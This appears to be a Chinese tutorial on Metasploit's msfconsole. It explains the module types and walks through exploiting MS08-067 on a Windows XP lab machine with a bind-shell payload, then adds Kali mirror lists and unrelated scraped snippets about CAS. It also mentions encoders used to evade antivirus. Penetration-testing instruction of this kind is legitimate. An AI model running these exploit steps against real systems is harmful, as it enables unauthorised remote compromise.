msfconsole 控制台使用和操作

article/2025/9/29 13:50:52

Msfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。 在启动MSF终端之后,可以首先输入help命令列出MSF终端所支持的命令列表,包括核心命令集和后端数据库命令集。对于其中的大部分命令,你可以输入help[COMMAND],进一步查看该命令的使用帮助信息。

1.输入 msfconsole 打开


2.然后输入 search ms08-067查找漏洞
打开远程桌面协议

use参数
这个是使用参数。如你要使用到某个利用模块,payload等,那么就要使用到use参数
使用漏洞 use 你选择的利用模块


Show参数
这个命令用的很多。请一定认真看。如果单纯的输入show,那么就会显示出所有的payload,利用模块,post模块,插件等等。但是一般我们都不这么使用。如果要显示利用模块,那么就输入show exploits。如果要显示payload,那么就输入show payloads。
展示可用载荷show payloads

查看还需要设置的选项 show options,为YES且空的就是还需要我们设置的。 可以看到下图中RHOST参数还未设置内容 


Set参数
这个主要是对payload或者其他模块进行设置。比如设置攻击目标的IP就是set RHOST 192.168.0.2

然后输入 exploit 执行攻击,输入exit退出

 

 

  • MSF的六个模块:exploit,encoder,payload,aux,post,nops
    • exploit——渗透攻击模块
        测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的有内存溢出,网站程序漏洞利用,配置错误exploit。
        exploits总的来说共分为两类溢出(exploit)攻击方法,即主动溢出和被动溢出。主动溢出是针对目标主机的漏洞主动的进行攻击以获得控制权限,被动溢出是针对目标主机被动的监听然后获得相应的操作。
        Exploit共分为13种,分别是:ais、bsdi、dialup、freebsd、hpux、irix、linux、multi、netware、osx、solaris、unix、windows。其中windows下面的最多。
  • encoder——编码器模块,对指令重新进行编码,用以实现反检测功能、指令顺利执行等
在metasploit中内置了27种encode模块,可对metasploit中的exploit进行编码(encode),以避免反病毒软件检测。如:
generic/none normal The "none" Encoder
mipsbe/longxor normal XOR Encoder
mipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 encoder
ppc/longxor normal PPC LongXOR Encoder
  • payload——攻击载荷模块, 由一些可动态运行在远程主机上的代码组成
我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立一
个反响连接,bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是只
能在目标机器上执行有限命令的程序。
  • aux——辅助模块,用以实现辅助攻击,如端口扫描工具、口令猜测破解、敏感信息嗅探等
  • post——后渗透攻击模块
在渗透攻击取得目标系统远程控制权之后,在受控系统中进行各式各样的后渗透攻击动作,比如获取敏感信息、进一步拓展、实施跳板攻击等。
  • nops——空指令模块,用以产生缓冲区填充的非操作性指令
  • 使用msfconsole,了解msfcli,msfgui

Metasploit目前提供了三种用户使用接口,一个是GUI模式,另一个是console终端模式,第三种是CLI(命令行)模式。msfcli 虽然和msfconsole一样同为命令行界面,

但是他不提供交互的命令行模式,直接通过命令行执行输出结果,直接调用辅助模块和攻击模块对目标进行渗透攻击,更为高效便捷。msfgui 图形化界面工具可

轻松地单击鼠标,输入目标 IP 地址,就可以使用 Metasploit 强大功能渗透进入目标系统 。 

  1. msfconsole模式最常用,启动方式:

输入msfconsole

运行此命令后将进入msf 命令提示符: 

msf>

2、获取命令的帮助信息:help

例子:help connect

3、Armitage :MSF 的一个图形接口

运行方式:armitage

  • 常用exploit,payload设置参数

  1. show exploit——显示Metasploit中所有渗透攻击模块
  2. show playload——查看所有活动状态的攻击载荷
  • 攻击靶机并获取shell

       被攻击者IP地址:192.168.120.131,操作系统Windows XP sp3 

       攻击者IP地址:192.168.120.130

1.//查找ms08_067漏洞

msf > search ms08_067

     

2、//使用MS08_067漏洞
 use exploit/windows/smb/ms08_067_netapi

3、//设置远程地址,正向连接
set RHOST 192.168.120.131

4、//设置ShellCode
set payload windows/shell_bind_tcp

5、//显示配置的选项
 show options

6、//expliot攻击

    成功返回Shell

源:

deb http://mirrors.ustc.edu.cn/kali sana main non-free contrib

 

deb http://mirrors.ustc.edu.cn/kali-security/ sana/updates main contrib non-free

 

deb-src http://mirrors.ustc.edu.cn/kali-security/ sana/updates main contrib non-free
#阿里云kali源

 

deb http://mirrors.aliyun.com/kali sana main non-free contrib

 

deb-src http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free
deb http://http.kali.org/kali kali-rolling main non-free contrib

deb cdrom:[Debian GNU/Linux 2.0 _Sana_ - Official Snapshot i386 LIVE/INSTALL Binary 20150811-09:06]/ sana contrib main non-free
deb cdrom:[Debian GNU/Linux 2.0 _Sana_ - Official Snapshot i386 LIVE/INSTALL Binary 20150811-09:06]/ sana contrib main non-free
deb http://http.kali.org/kali sana main non-free contrib
deb-src http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security/ sana/updates main contrib non-free
deb-src http://security.kali.org/kali-security/ sana/updates main contrib non-free
deb http://http.kali.org/kali kali main non-free contrib
deb-src http://http.kali.org/kali kali main non-free contrib
deb http://security.kali.org/kali-security kali/updates main contrib non-free
deb http://mirrors.aliyun.com/kali kali main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali main non-free contrib

 

deb http://mirrors.aliyun.com/kali kali main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali main non-free contrib
deb http://mirrors.aliyun.com/kali-security kali/updates main contrib non-free

 

deb http://mirrors.aliyun.com/kali-security kali/updates main contrib non-free


http://chatgpt.dhexx.cn/article/b94shJX4.shtml

相关文章

Msfconsole的基本使用

WIN XP ms12_020 复现 msfconsolesearch 查找模块use 装载模块winxp ip :192.168.186.133set RHOST 设置目标主机run 执行攻击目标蓝屏死机 重启常用命令show exploits 列出metasploit框架中的所有渗透攻击模块show payloads 列出metasploit框架中的所有攻击载荷sh…

metasploit msfconsole 命令参数

在MSF里面msfconsole可以说是最流行的一个接口程序。很多人一开始碰到msfconsole的时候就害怕了。那么多复杂的命令语句需要学习,但是msfconsole真的是一个强大的接口程序。Msfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有…

使用msfconsole常见问题解决

问题总结: (其中有我遇到的问题,有我没有遇到的,但我这里总结了一下别人遇到的,未雨绸缪)问题一(这个我也遇到过,不过我安装了上面的win 32就没问题了):原因…

msfconsole的简单使用

文章目录 前言一、入侵步骤ps之后通过学习了解了内网穿透 二、msfconsole常用命令总结 前言 Metasploit Framework 是非常优秀的开源渗透测试框架。 Metasploit 渗透测试框架(MSF3.4)包含3功能模块:msfconsole、msfweb、msfupdate。msfupdat…

msfconsole的使用,MSF17-010(虚拟机)的实验

一.介绍永恒之蓝: 二.环境 宿主机kali: IP地址 靶机win7: IP地址 然后关闭靶机防火墙,将kali,和win7的网络模式更改为NAT模式,然后使用宿主机和靶机ping对方的机器,保证ping通. 三.msfconsole的使用 1.输入命令msfconslole使用msf框架 2.search MSF17-010 搜索相关脚本 …

【MSFconsole工具】下载、启动方法、msf常用基础命令、模块功能、核心命令(入门初识)

目录 一、简介: 二、下载: 2.1、kali 2.2、官网: 2.3、GitHub: 三、启动方法 四、msf常用基础命令 五、msf结构 六、 核心命令: 一、简介: 很容易地获取、开发并对计算机软件漏洞实施攻击 附带数百…

kali msfconsole命令详解以及靶机攻破实战

一.msfconsole介绍 msfconsole简称msf是一款常用的渗透测试工具,包含了常见的漏洞利用模块和生成各种渗透文件,利用网站,手机等的漏洞将到目标靶机,操控目标靶机…这边仅供学习使用 msfconsole注:默认kali 预装了met…

内网安全:Msfconsole攻击技术(成功拿下服务器最高权限.)

Msfconsole工具 概括: Msfconsole简称(msf)是一款常用的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全测试人员的使用. 目录: Msfconsole的使用: 第一步:进行端…

SSO是什么?CAS是什么?

SSO SSO是目前比较流行的服务于企业业务整合的解决方案之一, SSO 使得在多个应用系统中,用户只需要 登录一次 就可以访问所有相互信任的应用系统。 CAS CAS 是 Yale 大学发起的一个企业级的、开源的项目,旨在为 Web 应用系统提供一种可靠的…

什么是CAS?

CAS 是 Yale (耶鲁)大学发起的一个开源项目,旨在为 Web 应用系统提供一种可靠的单点登录方法,CAS 在 2004 年 12 月正式成为 JA-SIG 的一个项目。CAS 具有以下特点: 【1】开源的企业级单点登录解决方案。 【2】CAS S…

什么是CAS和AQS

什么是CAS和AQS CAS理解概念ABA 问题 AQS理解获取同步状态AQS源码分析获取锁释放锁 CAS是一种乐观锁,通过在修改数据时,通过和原来的值进行比较,判断是否有被其他人改变。然后AQS是有一个对列,当线程获取不到锁的时候,…

cas 计算器 android,GeoGebra CAS计算器

GeoGebra CAS计算器app是一款非常不错的几何cas计算工具,支持精确解,展开,分解因式等计算功能,图形分解解析,坐标轴,曲线,参数信息详细,需要的可以下载GeoGebra CAS计算器app使用! 软件简介 求解…

【Java里的CAS机制】什么是CAS,CAS机制

CAS 一、什么是CAS二、CAS的三大缺点ABA问题 一、什么是CAS 前面两篇文章提到CAS操作,那么CAS操作到底是什么东西呢?今天我们来了解一下CAS机制 CAS(Compare-And-Swap),它是一条CPU并发原语,用于判断内存中某个位置的…

CAS机制是什么?

首先我们需要了解为什么有CAS机制的存在?那我们就不得不先知道互斥同步和非阻塞同步。 互斥同步 互斥同步面临的主要问题是进行线程阻塞和唤醒带来的性能开销,因此这种同步也叫阻塞同步。互斥同步属于悲观的并发策略,其总是认为只要不做同步…

CAS单点登录

简介 CAS是Central Authentication Service的缩写,中央认证服务,一种独立开放指令协议。CAS 是 耶鲁大学(Yale University)发起的一个开源项目,旨在为 Web 应用系统提供一种可靠的单点登录方法,CAS 在 200…

什么是CAS(乐观锁)

本文讲解CAS机制,主要是因为最近准备面试题,发现这个问题在面试中出现的频率非常的高,因此把自己学习过程中的一些理解记录下来,希望能对大家也有帮助。 什么是悲观锁、乐观锁?在java语言里,总有一些名词看…

CAS机制

文章目录 1、什么是CAS?2、CAS实现原子操作的3大问题?3、Unsafe类4、AtomicReference5、CAS——自旋锁 1、什么是CAS? CAS的全称是 Compare And Swap(比较再交换,确切一点称之为:比较并且相同再做交换&…

Java 中 CAS 是什么,有哪些实际应用场景

CAS 是什么 CAS(Compare And Swap)是一种并发编程中的原子操作,用于实现多线程之间的同步。在 Java 中,CAS 操作通过 sun.misc.Unsafe 类实现。 CAS 操作是一种乐观锁机制,它假设对于共享变量的修改操作不会引起冲突…

Java 什么是 CAS? 通俗易懂

Java 并发机制实现原子操作有两种: 一种是锁,一种是CAS。 CAS是Compare And Swap(比较并替换)的缩写。 java.util.concurrent.atomic中的很多类,如(AtomicInteger AtomicBoolean AtomicLong等)都…

什么是CAS?CAS有什么缺点?

文章目录 什么是CASCAS 举例说明CAS 底层实现CAS缺陷 什么是CAS CAS 的全称是 Compare And Swap 即比较交换,其算法核心思想如下函数:CAS(V,E,N) 参数: V 表示要更新的变量E 预期值N 新值 如果 V 值等于 E 值,则将 V 的值设为 …